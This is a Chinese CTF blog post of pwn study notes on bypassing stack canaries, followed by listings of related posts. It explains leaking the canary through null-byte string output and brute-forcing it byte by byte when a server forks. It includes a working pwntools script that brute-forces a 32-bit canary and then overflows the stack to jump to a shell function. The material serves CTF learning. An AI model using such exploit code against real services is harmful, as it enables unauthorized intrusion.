CTF pwn canary的绕过技巧

已于 2024-05-22 16:30:54 修改
阅读量204 收藏
点赞数 2
分类专栏: pwn的学习笔记 文章标签: linux python
于 2024-05-22 16:29:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zwb2603096342/article/details/139123241
版权

每遇到一种方法就补充一种

1.通过printf和puts遇到\x0才会输出停止的特性,来获得canary

64位的canary溢出在这篇博客里面有提到,32位也差不多,注意是rjust就行

XCTF pwn1 babystack-CSDN博客

2.爆破canary,这里有典型的特征

fork函数会直接拷贝父进程的内存,所以通过fork函数创建的子进程中的canary是相同的!!!

32位中,canary有4字节,其中最低位为0x00,然后逐字节爆破其余3位

核心代码附上:

#32位爆破canary
from pwn import *
import re
import time
context.log_level = 'debug'

conn = process('./canary')
#conn = remote("121.41.53.189",37265)
getshell = 0x080492EA

canary = b'\x00'
conn.recvuntil(b'Can you find me ? \n')
for i in range(3):
  for j in range(256):
    
    payload = b'a' * (0x80) + canary + p8(j)
    conn.send(payload)
    time.sleep(0.01)
    res = conn.recvuntil(b"Can you find me ? \n")
    if ( b"stack smashing detected" not in res):
        print(f'the {i} is {hex(j)}')
        canary += p8(j)
        break 
        
print(canary)
sleep(1)

# 第二次溢出
payload2 = b'a' * (0x80) + canary
payload2 += b'a'*0xc + p32(getshell)
conn.send(payload2)
conn.interactive()

具体这道题目呢,可以看我的这篇两校"联合杯"的博客(还没有写,后续有时间写) 

蒟蒻zwb
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ctf-pwn:canary绕过
chennbnbnb的博客
01-19 2949
文章目录覆盖00字符读出canary原理利用条件漏洞代码编译选项EXP利用格式化字符串漏洞读出canary原理漏洞代码编译选项EXP逐字节猜解canary原理漏洞代码编译EXPSSP Leak原理 覆盖00字符读出canary 原理 canary的值设计为以0x00结尾,防止read,printf灯函数直接读出 通过栈溢出覆盖最低位的字节,从而获得canary 利用条件 存在read/pri...
BugkuCTF-PWN题canary超详细讲解
am_03的博客
08-31 2191
知识点 小端序说明,数据在内存里是如何存储的?下表里数据都为16进制 解题流程 题目Hint:更新 LibcSeacher 的 libc-database checksec查看保护机制 0x28=40 0x10=16 0x29=41 0x300=768 0x2C=44 buf长度为48,而read读取长度为768 v5长度为520,而read读取长度为768 所以存在栈溢出漏洞 from pwn import * #sh = process('./pwn4_') #context.log_lev
CTFpwn常见保护及绕过:pie,canary
2302_79813730的博客
01-27 2232
这道题没有后门,我们还需要libc去做,这样我们需要泄露出一个正常的函数地址,来计算出libc_base,但是我们发现泄露的地址没有函数,libc_start_call_main(下称libc_call),这个函数我们不可以使用,因为找不到它的偏移(这里是因为虚拟机版本问题,一般libc_start_main(下称libc_main)可以被泄露出来)跟libc利用很像。之后跟进ctfshow函数,进行代码审计,第一个while循环没什么用,我们随便发送个数据就可以绕过,重点!
pwn学习】Canary的各种绕过姿势
Morphy_Amo的博客
12-24 5377
Canary各种绕过姿势
BugkuCTF pwn canary
ChaoYue_miku的博客
07-03 979
** 0、下载附件使用checksec检查保护情况 ** 开启了NX保护和Canary保护 ** 1、nc 114.67.246.176 19138远程连接,查看题目 ** ** 2、使用IDA 64 Pro打开文件反编译 ** 查看main函数,两个read()函数都可以读取0x300个字节的数据,而buf和v5到栈底指针rbp的距离只有0x240和0x210字节,因此这里存在栈溢出漏洞 靠近栈底处的var_8应该就是canary 查看main函数的汇编指令 结合题意可知,覆盖canary末尾的
PWN入门(10)绕过程序堆栈Canary防护
Ba1_Ma0的博客
10-05 1071
简介“pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用下载这个github库,进入10文件夹。
pwn绕过canary保护机制新手版
educat0r的博客
03-27 2932
介绍 通俗来说,canary保护是为了防止程序能够被溢出的地方不让溢出 比如一个输入函数能够输入100个字节的内容,但是它的变量只有50个字节的大小,因为这个程序是可以接受你输入超过50个字节大小的内容的。我们就可以先输入50个字节的无用数据,然后再输入一串你想跳转到的地址把后面的return函数存在的原本的地址覆盖了,,这样程序执行完这个输入函数就会跳转到你输入的那个地址去。 而canary则是...
ctf(pwn) canary保护机制讲解 与 解密方法介绍
半岛铁盒的博客
03-03 2135
Canary保护机制 canary的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 在函数开始时就随机产生一个值,将这个值CANARY放到栈上紧挨ebp的上一个位置,当攻击者想通过缓冲区溢出覆盖ebp或者ebp下方的返回地址时,一定会覆盖掉CANARY的值;当程序结束时,程序会检查CANARY这个值和之前的是否一致,如果不一致,则不会往下运行,从而避免了缓冲区溢出攻
CTF中的PWN——绕canary防护1(32bit 格式化字符串漏洞leak canary 栈溢出)
壊壊的诱惑你的博客
09-29 1185
前言: 金丝雀: canary就像哨兵一样,值由程序运行时随机产生。在函数返回之前,程序检测这个值以确认栈未被破坏,达到避免攻击的目的。程序会使用fs:x来进行保护,这个地址指向了一个我们无法看到的随机值,并且fs是一个由内核维护的结构。 如果金丝雀(canary)的值被修改了,栈溢出发生了,保存的指令指针可能也被修改了,因此不能安全返回,函数会调用__stack_chk_f...
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
CTF PWN专用虚拟机-附件资源
03-05
CTF PWN专用虚拟机-附件资源
CTF PWN 武器库题
12-12
CTF PWN 武器库题或rifle题,利用fastbin堆溢出得shell,
welpwn::sparkling_heart:CTFpwn框架
02-04
libc address heap address stack address program address (带有PIE ) canary 支持多glibc调试。 2.19、2.23-2.29 32位和64位调试增强(支持PIE )。 符号断点杂项libc-database one_gadget 堆? 好吧,不支持堆...
Linux】Xshell和Xftp简介_安装_VMware虚拟机使用
wosixiaokeai的博客
06-19 1117
Xftp是一个功能强大的SFTP、FTP文件传输软件,它允许MS Windows用户安全地在UNIX/Linux和Windows PC之间传输文件。Xftp支持SFTP协议,确保所有通过该软件的网络流量都是加密的。它采用了标准的Windows风格的向导,用户界面直观易用,可以很好地与其他Windows应用程序协同工作。Xftp的特色功能包括同步功能、直接编辑远程文件、多窗格支持、文件交换协议(FXP)支持等,这些功能使得文件传输更加容易和快捷。
Linux中文件查找相关命令比较
lurenyi168的专栏
06-16 433
Linux中与文件定位的命令有find、locate、whereis、which,type。
Linux开发讲课7---Linux sysfs文件系统
最新发布
qq_42837317的博客
06-21 661
Sysfs通过文件和目录的方式组织信息,其中每个文件或目录对应于系统中的一个设备、驱动程序或者其他内核对象。当内核中的设备、驱动程序等对象被创建时,相应的Kobject也会被创建,然后通过Sysfs将其信息暴露给用户空间。Sysfs通常被挂载在/sys目录下,它提供了一种方便的方式,让用户空间的程序可以动态地获取和管理系统中的设备信息,而无需直接访问内核数据结构。(2)创建sysfs文件。其中attr表示将要创建的文件(属性),而show和store分别表示对应的sysfs文件在读和写操作时的回调函数。
镜像源问题:pip,npm,git,Linux,docker
unravel_tom的博客
06-18 391
提高下载速度:镜像源通常位于全球不同的地理位置,用户可以选择离自己最近的镜像源下载软件或更新,从而大大提高下载速度和效率。负载均衡:通过将下载请求分散到多个镜像源,可以减轻主服务器的负载,防止单一服务器因过载而崩溃,提高整个系统的稳定性和可靠性。提升用户体验:通过提供更快速、稳定的下载途径,镜像源可以显著提升用户的整体使用体验。​。
Linux-安装及管理程序
A6985HG的博客
06-19 635
定义:本地Yum源是指将软件包存储在本地服务器或存储设备上的源。这些软件包可以是从官方源下载后本地存储的,也可以是用户自己编译的软件包。优点:本地Yum源的主要优势在于访问速度和可控性。由于软件包位于本地网络或服务器上,因此安装和更新速度快,尤其是在没有稳定互联网连接或需要大规模部署的情况下更为实用。
ctf pwn 计算器
10-05
引用是一段代码,它使用了Pythonpwn库来进行CTF中的pwn攻击。pwn攻击是指通过分析程序本身的漏洞,编写利用脚本来获取主机权限。这种攻击需要对程序进行深入分析,了解操作系统的特性和相关漏洞。因此,CTF pwn...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值